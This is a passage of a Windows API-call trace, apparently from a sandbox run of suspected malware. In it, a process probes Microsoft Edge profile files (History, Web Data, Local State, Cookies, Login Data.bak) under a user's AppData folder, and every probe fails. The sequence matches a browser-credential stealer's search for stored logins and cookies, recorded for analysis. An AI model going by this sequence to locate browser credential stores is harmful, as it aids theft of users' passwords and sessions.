0x5f0000 [0180.428] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620050, Size=0x99) returned 0x611f60 [0180.428] GetProcessHeap () returned 0x5f0000 [0180.428] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4d) returned 0x620640 [0180.428] GetProcessHeap () returned 0x5f0000 [0180.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.428] GetProcessHeap () returned 0x5f0000 [0180.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c790 | out: hHeap=0x5f0000) returned 1 [0180.428] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.428] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\History") returned 0 [0180.428] GetProcessHeap () returned 0x5f0000 [0180.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620640 | out: hHeap=0x5f0000) returned 1 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f430 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.429] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.429] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.429] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.429] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613bc0 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613bc0, Size=0x8b) returned 0x61caf0 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620230 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620230, Size=0x9b) returned 0x611f60 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4e) returned 0x620960 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.429] GetProcessHeap () returned 0x5f0000 [0180.429] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61caf0 | out: hHeap=0x5f0000) returned 1 [0180.430] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.430] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Web Data") returned 0 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620960 | out: hHeap=0x5f0000) returned 1 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f290 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615dc0 [0180.430] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.430] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.430] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.430] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613320 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613ad0 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613ad0, Size=0x8b) returned 0x61c820 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620960 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620960, Size=0xa7) returned 0x6247e0 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x54) returned 0x618b30 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.430] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.430] GetProcessHeap () returned 0x5f0000 [0180.431] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c820 | out: hHeap=0x5f0000) returned 1 [0180.431] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.431] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\..\\Local State") returned 0 [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618b30 | out: hHeap=0x5f0000) returned 1 [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f420 [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.431] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.431] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.431] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.431] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x6137d0 [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6137d0, Size=0x8b) returned 0x61caf0 [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620550 [0180.431] GetProcessHeap () returned 0x5f0000 [0180.431] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620550, Size=0x99) returned 0x611f60 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4d) returned 0x620280 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61caf0 | out: hHeap=0x5f0000) returned 1 [0180.432] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.432] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Cookies") returned 0 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620280 | out: hHeap=0x5f0000) returned 1 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x105) returned 0x6247e0 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2e0 [0180.432] lstrlenA (lpString=0x0) returned 0 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3b0 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x105) returned 0x624900 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615dc0 [0180.432] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.432] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x624900, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.432] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.432] GetProcessHeap () returned 0x5f0000 [0180.432] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f280 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x8b) returned 0x61ce50 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620730 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620730, Size=0x9f) returned 0x611f60 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x6204b0 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6204b0, Size=0xa7) returned 0x624a20 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61ce50 | out: hHeap=0x5f0000) returned 1 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f280 | out: hHeap=0x5f0000) returned 1 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ea0 [0180.433] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x624a20, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0180.433] GetProcAddress (hModule=0x7ffb288f0000, lpProcName="SysAllocStringLen") returned 0x7ffb288fe5b0 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f320 [0180.433] GetProcessHeap () returned 0x5f0000 [0180.433] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ea0 [0180.433] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0180.434] GetProcessHeap () returned 0x5f0000 [0180.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x624a20, cbMultiByte=83, lpWideCharStr=0x624c98, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak") returned 83 [0180.434] GetProcessHeap () returned 0x5f0000 [0180.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615f60 [0180.434] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0180.434] GetProcessHeap () returned 0x5f0000 [0180.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0180.434] GetProcessHeap () returned 0x5f0000 [0180.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f3e0 [0180.434] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0180.434] GetProcessHeap () returned 0x5f0000 [0180.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3e0 | out: hHeap=0x5f0000) returned 1 [0180.434] GetProcessHeap () returned 0x5f0000 [0180.434] GetProcessHeap () returned 0x5f0000 [0180.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f300 [0180.434] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0180.434] GetProcessHeap () returned 0x5f0000 [0180.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f300 | out: hHeap=0x5f0000) returned 1 [0180.434] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f320, Size=0x54) returned 0x618110 [0180.434] GetProcessHeap () returned 0x5f0000 [0180.434] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ea0 [0180.434] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0180.434] GetProcessHeap () returned 0x5f0000 [0180.434] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak", cchWideChar=83, lpMultiByteStr=0x618110, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak", lpUsedDefaultChar=0x0) returned 83 [0180.435] GetProcAddress (hModule=0x7ffb288f0000, lpProcName="SysFreeString") returned 0x7ffb28900ae0 [0180.435] GetProcessHeap () returned 0x5f0000 [0180.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x54) returned 0x6188f0 [0180.435] GetProcessHeap () returned 0x5f0000 [0180.435] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618110 | out: hHeap=0x5f0000) returned 1 [0180.435] GetProcessHeap () returned 0x5f0000 [0180.435] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6188f0 | out: hHeap=0x5f0000) returned 1 [0180.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2a0) returned 0x624d50 [0180.435] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624d50) returned 0x2a0 [0180.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613320 [0180.435] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613320) returned 0x30 [0180.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x611f60 [0180.435] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611f60) returned 0x80 [0180.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615ca0 [0180.435] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ca0) returned 0x20 [0180.435] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x625000 [0180.435] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625000) returned 0x80 [0180.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615ce0 [0180.436] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ce0) returned 0x20 [0180.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x625090 [0180.436] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625090) returned 0x80 [0180.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615dc0 [0180.436] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615dc0) returned 0x20 [0180.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x58) returned 0x618470 [0180.436] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618470) returned 0x58 [0180.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x48) returned 0x620960 [0180.436] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x620960) returned 0x48 [0180.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x88) returned 0x61ca60 [0180.436] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x61ca60) returned 0x88 [0180.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x828) returned 0x625120 [0180.436] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0x828 [0180.436] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x618470, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0180.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa8) returned 0x625960 [0180.436] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625960) returned 0xa8 [0180.436] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x618470, cbMultiByte=-1, lpWideCharStr=0x625960, cchWideChar=84 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak") returned 84 [0180.436] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0180.436] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb0) returned 0x625a20 [0180.436] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625a20) returned 0xb0 [0180.436] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak", nBufferLength=0x57, lpBuffer=0x625a20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak", lpFilePart=0x0) returned 0x53 [0180.436] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625960) returned 0xa8 [0180.436] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625960 | out: hHeap=0x5f0000) returned 1 [0180.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0180.437] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x58) returned 0x618710 [0180.437] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618710) returned 0x58 [0180.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak", cchWideChar=-1, lpMultiByteStr=0x618710, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak", lpUsedDefaultChar=0x0) returned 84 [0180.437] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625a20) returned 0xb0 [0180.437] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625a20 | out: hHeap=0x5f0000) returned 1 [0180.437] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618710) returned 0x58 [0180.437] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618710 | out: hHeap=0x5f0000) returned 1 [0180.437] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3c0) returned 0x625960 [0180.437] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625960) returned 0x3c0 [0180.437] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0x828 [0180.437] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625120 | out: hHeap=0x5f0000) returned 1 [0180.437] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0180.437] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa8) returned 0x625120 [0180.437] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0xa8 [0180.437] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c10, cbMultiByte=-1, lpWideCharStr=0x625120, cchWideChar=84 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak") returned 84 [0180.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\default\\login data.bak"), fInfoLevelId=0x0, lpFileInformation=0x5cef70 | out: lpFileInformation=0x5cef70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.437] GetLastError () returned 0x3 [0180.437] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\default\\login data.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0180.437] GetLastError () returned 0x3 [0180.437] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x3, dwLanguageId=0x0, lpBuffer=0x5ced78, nSize=0x0, Arguments=0x0 | out: lpBuffer="蓐a") returned 0x2c [0180.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.438] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613440 [0180.438] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, 